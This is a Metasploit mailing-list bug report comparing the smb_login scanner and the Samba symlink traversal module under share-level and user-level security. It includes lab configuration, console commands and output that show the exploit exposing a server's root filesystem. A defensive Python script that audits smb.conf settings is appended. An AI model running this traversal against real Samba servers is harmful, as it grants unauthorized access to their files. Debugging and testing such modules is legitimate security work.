Metasploit mailing list archives

smb_login and "security = share"


From: Nicob <nicob () nicob net>
Date: Fri, 12 Feb 2010 00:33:21 +0100

Hello,

It seems that Metasploit (svn r8458) can't fully log in to a Samba share
(and exploit the symlink vulnerability) when the Samba "security" option
is set to "share" (instead of "user"). However, the exploit based on
kingcope's modified smbclient is working fine in both situations.

[-=-] Config:

nicob is a valid user, his password is tototo
user ffffff doesn't exist

[global]
        lanman auth = yes
        workgroup = HOME
        netbios name = HOME
        security = [share or user]
        encrypt passwords = yes
        passdb backend = smbpasswd
        smb passwd file = /etc/samba/msf_passwd
        browseable = yes
[NAS]
        path=/tmp/
        comment = NAS Share
        browseable = yes
        read only = no

[-=-] if security = share:

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(smb_login) > set SMBPass tototo
SMBPass => tototo
msf auxiliary(smb_login) > set SMBUser nicob
SMBUser => nicob
msf auxiliary(smb_login) > run

[*] Starting host 127.0.0.1
[*] 127.0.0.1 - GUEST LOGIN (Unix) nicob : tototo
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(smb_login) > set SMBUser fffffff
SMBUser => fffffff
msf auxiliary(smb_login) > set SMBPass foo
SMBPass => foo
msf auxiliary(smb_login) > rerun

[*] Starting host 127.0.0.1
[*] 127.0.0.1 - GUEST LOGIN (Unix) ffffff : foo
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

=> only "GUEST" access is detected
=> username and password are irrelevant

msf auxiliary(samba_symlink_traversal) > rerun

[*] Connecting to the server...
[*] Trying to mount writeable share 'NAS'...
[-] Auxiliary failed: Rex::Proto::SMB::Exceptions::ErrorCode The server
responded with error: STATUS_WRONG_PASSWORD (Command=117 WordCount=0)
[-] Call stack:
[-]   xxx/trunk/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'
[-]   xxx/trunk/lib/rex/proto/smb/client.rb:951:in `tree_connect'
[-]   xxx/trunk/lib/rex/proto/smb/simpleclient.rb:253:in `connect'
[-]   (eval):64:in `run'
[*] Auxiliary module execution completed

=> exploit failed

[-=-] if security = user:

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(smb_login) > set SMBPass tototo
SMBPass => tototo
msf auxiliary(smb_login) > set SMBUser nicob
SMBUser => nicob
msf auxiliary(smb_login) > run

[*] Starting host 127.0.0.1
[+] 127.0.0.1 - SUCCESSFUL LOGIN (Unix) 'nicob' : 'tototo'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

=> nicob/tototo is detected as a valid login

msf auxiliary(samba_symlink_traversal) > rerun

[*] Connecting to the server...
[*] Trying to mount writeable share 'NAS'...
[*] Trying to link 'escape' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*]     \\127.0.0.1\NAS\escape\
[*] Auxiliary module execution completed

=> exploit is working

Nicob
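As an added example (not code from the post or from Metasploit), a small Python check that parses an smb.conf like the one above and flags the settings behind the misleading "GUEST LOGIN" result: share-level security, LANMAN auth, and writable shares behind share-level security. The sample configuration is constructed from the post, and the fallback values used when a key is absent (security = user, lanman auth = no, read only = yes) are assumptions.

```python
import re

# Constructed sample (an assumption for this example): the [global] and
# [NAS] sections from the post, with security set to "share".
SAMPLE_SMB_CONF = """\
[global]
        lanman auth = yes
        workgroup = HOME
        security = share
        encrypt passwords = yes
[NAS]
        path=/tmp/
        comment = NAS Share
        browseable = yes
        read only = no
"""

TRUE_VALUES = ("yes", "true", "1")

def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}} (names lowercased).
    Only lines starting with '#' or ';' are comments, as in Samba."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        match = re.fullmatch(r"\[(.+)\]", line)
        if match:
            current = match.group(1).strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def audit_smb_conf(text):
    """Return (section, issue) findings for the weak settings in the post."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    share_level = glob.get("security", "user").lower() == "share"  # assumed default
    findings = []
    if share_level:
        findings.append(("global", "security = share: per-user credentials are not checked"))
    if glob.get("lanman auth", "no").lower() in TRUE_VALUES:  # assumed default
        findings.append(("global", "lanman auth = yes: LM responses accepted"))
    for name, opts in conf.items():
        if name == "global":
            continue
        # "writable"/"writeable" are Samba's inverted synonyms of "read only".
        writable = (opts.get("read only", "yes").lower() not in TRUE_VALUES
                    or any(opts.get(k, "no").lower() in TRUE_VALUES
                           for k in ("writable", "writeable")))
        if writable and share_level:
            findings.append((name, "writable share behind share-level security"))
    return findings

if __name__ == "__main__":
    for section, issue in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{section}] {issue}")
```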
